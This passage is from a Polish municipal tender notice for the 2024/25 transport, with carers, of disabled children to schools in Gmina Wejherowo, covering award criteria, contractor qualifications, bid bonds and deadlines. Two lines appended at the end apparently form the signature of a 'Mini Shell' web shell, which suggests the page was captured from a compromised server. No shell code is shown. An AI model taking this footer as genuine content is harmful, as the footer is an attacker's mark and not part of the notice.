</span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przeznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie opiekuna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">posiadanie fotorejestratora w pojazdach przeznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest świadczenie usług przewozowych w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, zamieszkałych na terenie Gminy Wejherowo na trasie dom - placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej tj. od 01.09.2024 roku do 31.08.2025 roku <br/>Zakres przedmiotu zamówienia obejmuje przewóz do placówek oświatowych: <br/>1) Powiatowy Zespół Kształcenia Specjalnego Specjalny Ośrodek Szkolno Wychowawcy Nr 1 w Wejherowie, ul. Sobieskiego 279 - uczniów zamieszkałych w miejscowościach:<br/>a) Bolszewo - 6 osób, w tym 1 poruszająca się na wózku inwalidzkim;<br/>b) Orle - 5 osób;<br/>c) Góra - 1 osoba;<br/>d) Kniewo - 1 osoba;<br/>e) Zamostne - 1 osoba<br/>2) Przedszkole Uśmiech Dziecka w Wejherowie, ul. Chopina 15 ucznia zamieszkałego w Bolszewie - 1 osoba. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 1. Zamawiający w trakcie realizacji przedmiotu zamówienia przewiduje skorzystanie z prawa opcji, zgodnie z art. 441 ust. 1 ustawy Pzp dla części 1, części 3 i części 4 zamówienia.<br/>2. Opcja przewidziana przez Zamawiającego polega na zwiększeniu przedmiotu zamówienia, w zakresie dowozu i przywozu uczniów niepełnosprawnych wraz z opieką, na trasie dom – placówka oświatowa – dom, we wszystkie dni funkcjonowania placówek oświatowych, które umożliwiają dzieciom realizację obowiązku szkolnego w okresie nauki szkolnej, nie więcej niż o 6 (sześcioro) dzieci niepełnosprawnych, zamieszkałych na terenie Gminy Wejherowo.<br/>3. Zamawiający uprawniony będzie do złożenia oświadczenia o skorzystaniu z Opcji lub jej części w trakcie trwania umowy na realizację Przedmiotu zamówienia. Zamawiający może nie skorzystać z Opcji lub skorzystać z Opcji w niepełnym zakresie, a Wykonawcy z tego tytułu nie będzie przysługiwało żadne roszczenie w stosunku do Zamawiającego. Zamawiający może złożyć oświadczenie o skorzystaniu z Opcji wielokrotnie, aż do wyczerpania maksymalnej wartości Opcji.<br/>4. Termin wykonania Opcji jest równy terminowi wykonania przedmiotu zamówienia. <br/>5. Zamawiający przewiduje możliwość skorzystania z Opcji pod warunkiem zabezpieczenia środków finansowych w budżecie, w wysokości odpowiadającej uruchamianemu zakresowi Opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-01 do 2025-08-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">rok produkcji pojazdu przeznaczonego do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie opiekuna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">15</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">posiadanie fotorejestratora w pojazdach przeznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	zdolności technicznej lub zawodowej:<br/>a)	w zakresie doświadczenia Wykonawcy:<br/>-Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie do realizacji przedmiotu zamówienia na odpowiednim poziomie jakości, jeżeli wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi, z których każda obejmowała świadczenie usług przewozowych w zakresie przewozu dzieci niepełnosprawnych przez okres, co najmniej 4 miesięcy wraz z opieką nad przewożonymi dziećmi przez osobę, która nie była jednocześnie kierowcą w danym pojeździe.<br/>UWAGA 1: Za jedną usługę Zamawiający uzna świadczenie, zrealizowane na podstawie jednej umowy. <br/>UWAGA 2: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnienie wyżej wymienionego warunku Wykonawcy mogą wykazać łącznie.<br/>UWAGA 3: Spełnienie powyższego warunku, uprawnia Wykonawcę do złożenia oferty w ramach jednej lub dwóch dowolnie wybranych części zamówienia.<br/>-Zamawiający uzna, że Wykonawca posiada niezbędne doświadczenie do realizacji przedmiotu zamówienia na odpowiednim poziomie jakości, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał co najmniej dwie usługi, z których każda obejmowała świadczenie usług przewozowych w zakresie przewozu dzieci niepełnosprawnych przez okres, co najmniej 8 miesięcy wraz z opieką nad przewożonymi dziećmi przez osobę, która nie była jednocześnie kierowcą w danym pojeździe.<br/>UWAGA 1: Za jedną usługę Zamawiający uzna świadczenie, zrealizowane na podstawie jednej umowy. <br/>UWAGA 2: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, spełnienie wyżej wymienionego warunku Wykonawcy mogą wykazać łącznie.<br/>UWAGA 3: Spełnienie powyższego warunku, uprawnia Wykonawcę do złożenia oferty w ramach trzech lub czterech dowolnie wybranych części zamówienia.<br/>b)	w zakresie dysponowania sprzętem niezbędnym w celu realizacji zamówienia<br/>W RAMACH CZĘŚCI 1 i CZĘŚCI 3:<br/>-Zamawiający uzna, że Wykonawca spełnienia warunek dysponowania sprzętem niezbędnym w celu realizacji części 1 i części 3 zamówienia, dla każdej części zamówienia z osobna, jeżeli wykaże, że dysponuje lub będzie dysponować w czasie realizacji zamówienia minimum dwoma sprawnymi technicznie środkami transportu do przewozu osób, wyposażonymi w nadajnik GPS, umożliwiający śledzenie pojazdów w czasie rzeczywistym, w tym, co najmniej jednym pojazdem specjalistycznym, dostosowanym do przewozu osób niepełnosprawnych, poruszających się na wózku inwalidzkim. Samochód specjalistyczny powinien być wyposażony w rampę lub windę umożliwiającą załadunek i rozładunek wózka z pasażerem oraz zapewnić bezpieczeństwo dzieciom w czasie podróży (minimalna wysokość użytkowa wnętrza pojazdu: 1600 mm, minimalna szerokość wnętrza pojazdu 1700 mm). <br/>W RAMACH CZĘŚCI 2:<br/>-Zamawiający uzna, że Wykonawca spełnienia warunek dysponowania sprzętem niezbędnym w celu realizacji części 2 zamówienia, jeżeli wykaże, że dysponuje lub będzie dysponować w czasie realizacji zamówienia co najmniej jednym, sprawnym technicznie pojazdem specjalistycznym, wyposażonym w nadajnik GPS, umożliwiający śledzenie pojazdu w czasie rzeczywistym, dostosowanym do przewozu osób niepełnosprawnych, poruszających się na wózku inwalidzkim. Samochód specjalistyczny powinien być wyposażony w rampę lub windę umożliwiającą załadunek i rozładunek wózka z pasażerem oraz zapewnić bezpieczeństwo dzieciom w czasie podróży (minimalna wysokość użytkowa wnętrza pojazdu: 1600 mm, minimalna szerokość wnętrza pojazdu 1700 mm).<br/>W RAMACH CZĘŚCI 4:<br/>-	Zamawiający uzna, że Wykonawca spełnienia warunek dysponowania sprzętem niezbędnym w celu realizacji części 4 zamówienia, jeżeli wykaże, że dysponuje lub będzie dysponować w czasie realizacji zamówienia minimum trzema sprawnymi technicznie środkami transportu do przewozu osób, wyposażonymi w nadajnik GPS, umożliwiający śledzenie pojazdów w czasie rzeczywistym, w tym, co najmniej jednym pojazdem specjalistycznym, dostosowanym do przewozu osób niepełnosprawnych, poruszających się na wózku inwalidzkim. Samochód specjalistyczny powinien być wyposażony w rampę lub windę umożliwiającą załadunek i rozładunek wózka z pasażerem oraz zapewnić bezpieczeństwo dzieciom w czasie podróży (minimalna wysokość użytkowa wnętrza pojazdu: 1600 mm, minimalna szerokość wnętrza pojazdu 1700 mm). <br/>UWAGA 1!: W przypadku składania oferty na więcej niż jedną część zamówienia, Wykonawca musi dysponować pojazdami w ilości wynikającej z sumy ilości wskazanej dla wybranych części.<br/>UWAGA 2!: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dopuszczalne jest łączne spełnienie warunku przez Wykonawców.<br/>c)	w zakresie osób skierowanych przez Wykonawcę do realizacji zamówienia: <br/>W RAMACH CZĘŚCI 1 i CZĘŚCI 3:<br/>-Zamawiający uzna warunek za spełniony, jeżeli Wykonawca skieruje do realizacji części 1 i części 3 zamówienia, dla każdej części zamówienia z osobna, minimum dwie osoby, które będą bezpośrednio wykonywały czynności związane z opieką nad przewożonymi dziećmi, posiadające minimum 6 miesięczne doświadczenie w zakresie opieki nad dziećmi niepełnosprawnymi, każda osoba z osobna, które będą pełnić funkcję Opiekuna.<br/>UWAGA 1!: Wykonawca, na potwierdzenie spełnienia warunku udziału w postępowaniu, może sumować doświadczenie osoby skierowanej do realizacji zamówienia, uzyskane na podstawie kilku zrealizowanych umów łącznie, jednak nie krótszych niż 3 – miesięczne, w zaokrągleniu do pełnych miesięcy w dół. <br/>UWAGA 2!: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dopuszczalne jest łączne spełnienie warunku przez Wykonawców.<br/>UWAGA 3!: W przypadku składania oferty na więcej niż jedną część zamówienia, Wykonawca musi dysponować osobami w ilości wynikającej z sumy ilości wskazanej dla wybranych części.<br/>W RAMACH CZĘŚCI 2:<br/>-Zamawiający uzna warunek za spełniony, jeżeli Wykonawca skieruje do realizacji zamówienia minimum jedną osobę, która będzie bezpośrednio wykonywała czynności związane z opieką nad przewożonymi dziećmi, posiadającą minimum 6 miesięczne doświadczenie w zakresie opieki nad dziećmi niepełnosprawnymi i która będzie pełniła funkcję Opiekuna.<br/>UWAGA 1!: Wykonawca, na potwierdzenie spełnienia warunku udziału w postępowaniu, może sumować doświadczenie osoby skierowanej do realizacji zamówienia, uzyskane na podstawie kilku zrealizowanych umów łącznie, jednak nie krótszych niż 3 – miesięczne, w zaokrągleniu do pełnych miesięcy w dół. <br/>UWAGA 2!: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia spełnienie warunku wykazuje jeden Wykonawca w całości.<br/>UWAGA 3!: W przypadku składania oferty na więcej niż jedną część zamówienia, Wykonawca musi dysponować osobami w ilości wynikającej z sumy ilości wskazanej dla wybranych części.<br/>W RAMACH CZĘŚCI 4:<br/>-Zamawiający uzna warunek za spełniony, jeżeli Wykonawca skieruje do realizacji zamówienia minimum trzy osoby, które będą bezpośrednio wykonywały czynności związane z opieką nad przewożonymi dziećmi, posiadające minimum 6 miesięczne doświadczenie w zakresie opieki nad dziećmi niepełnosprawnymi, każda osoba z osobna, które będą pełnić funkcję Opiekuna.<br/>UWAGA 1!: Wykonawca na potwierdzenie spełnienia warunku udziału w postępowaniu może sumować doświadczenie osoby skierowanej do realizacji zamówienia uzyskane na podstawie kilku zrealizowanych umów łącznie, jednak nie krótszych niż 3 – miesięczne, w zaokrągleniu do pełnych miesięcy w dół. <br/>UWAGA 2!: W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dopuszczalne jest łączne spełnienie warunku przez Wykonawców.<br/>UWAGA 3!: W przypadku składania oferty na więcej niż jedną część zamówienia, Wykonawca musi dysponować osobami w ilości wynikającej z sumy ilości wskazanej dla wybranych części.<br/>2.	Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli zajdzie okoliczność występowania u Wykonawcy sprzecznych interesów, w szczególności zaangażowania zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy, które mogą mieć negatywny wpływ na realizację zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 p.z.p., o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594), z innym Wykonawcą, który złożył odrębną ofertę w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ; Zamawiający wzywa do złożenia niniejszego oświadczenia w przypadku, gdy dla danej części złożono więcej niż jedną ofertę;<br/>2)	odpis lub informację z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy p.z.p., sporządzonych nie wcześniej</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem daty wykonania i podmiotu na rzecz którego usługa została wykonana oraz załączeniem dowodów określających czy te usługi zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługa została wykonana. Jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy - załącznik nr 4 do SWZ;<br/>2)	wykaz środków transportu przeznaczonych do realizacji wraz z informacjami na temat ich marki, modelu, numeru rejestracyjnego, posiadania GPS i fotorejestratora, roku produkcji, wymiarów użytkowych wnętrza pojazdów specjalistycznych oraz informacją o podstawie dysponowania tymi pojazdami – załącznik nr 5.1 do SWZ;<br/>3)	wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia wraz z informacjami na temat ich doświadczenia, zakresem do wykonania przez nie czynności oraz informacją o podstawie dysponowania tymi osobami – załącznik nr 5.2 do SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający żąda od Wykonawców wniesienia wadium w wysokości:<br/>1)	Dla części 1 – 2 000,00 zł (słownie: dwa tysiące złotych),<br/>2)	Dla części 2 – 1 000,00 zł (słownie: tysiąc złotych),<br/>3)	Dla części 3 – 2 000,00 zł (słownie: dwa tysiące złotych),<br/>4)	Dla części 4 – 2 000,00 zł (słownie: dwa tysiące złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert w jednej lub kilku formach, określonych w art. 97 ust. 7 p.z.p., w zależności od wyboru Wykonawcy.<br/>3.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego – Bank Millennium S.A. Nr konta: 80 1160 2202 0000 0000 6196 3934 z podaniem tytułu: „wadium w ramach części……..* w postępowaniu: Przewóz wraz z opieką dzieci niepełnosprawnych zamieszkałych na terenie Gminy Wejherowo do/z placówek oświatowych od dnia 01.09.2024 r. do dnia 31.08.2025 r. z podziałem na 4 części, RZPiFZ.271.23.2024.MW”<br/>*wpisać nr części której dotyczy wadium<br/>UWAGA: Za termin wniesienia wadium w pieniądzu zostanie przyjęty termin uznania rachunku Zamawiającego. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem.<br/>4.	Wadium wnoszone w formie gwarancji lub poręczenia przekazuje się w oryginale w postaci elektronicznej.<br/>5.	Wadium w formie gwarancji lub poręczenia musi spełniać, co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w p.z.p.;<br/>2)	z jego treści powinno jednoznacznie wynikać zobowiązanie gwaranta/poręczyciela do zapłaty całej kwoty wadium;<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania gwarancji/poręczenia nie może być krótszy niż termin związania ofertą (z zastrzeżeniem, że pierwszym dniem terminu związania ofertą jest dzień, w którym upływa termin składania ofert);<br/>5)	w treści gwarancji/poręczenia powinna znaleźć się nazwa oraz numer przedmiotowego postępowania;<br/>6)	beneficjentem gwarancji/poręczenia jest Gmina Wejherowo, ul. Transportowa 1, 84-200 Wejherowo;<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający wymaga, aby gwarancja/poręczenie obejmowało swą treścią (tj. zobowiązanych z tytułu gwarancji/poręczenia) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia;<br/>8)	musi mieć taką samą płynność, jak wadium wniesione w pieniądzu – dochodzenie roszczenia z tytułu wadium wniesionego w formie gwarancji lub poręczenia nie może być utrudnione. Dlatego w treści gwarancji lub poręczenia powinna znaleźć się informacja, że podlega prawu polskiemu. <br/>6.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 p.z.p., zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 p.z.p.<br/>7.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 p.z.p. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale X ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które usługi wykonają poszczególni wykonawcy (wzór oświadczenia stanowi załącznik nr 7 do SWZ).<br/>4.	Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach określonych w projektowanych postanowieniach umowy, stanowiących załączniki nr 9 do SWZ. <br/>2.	Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3.	Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 p.z.p. oraz wskazanym w projektowanych postanowieniach umowy stanowiących załączniki nr 9 do SWZ.<br/>4.	Zmiana umowy wymaga dla swej ważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-23 11:55</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gmina_wejherowo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-23 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com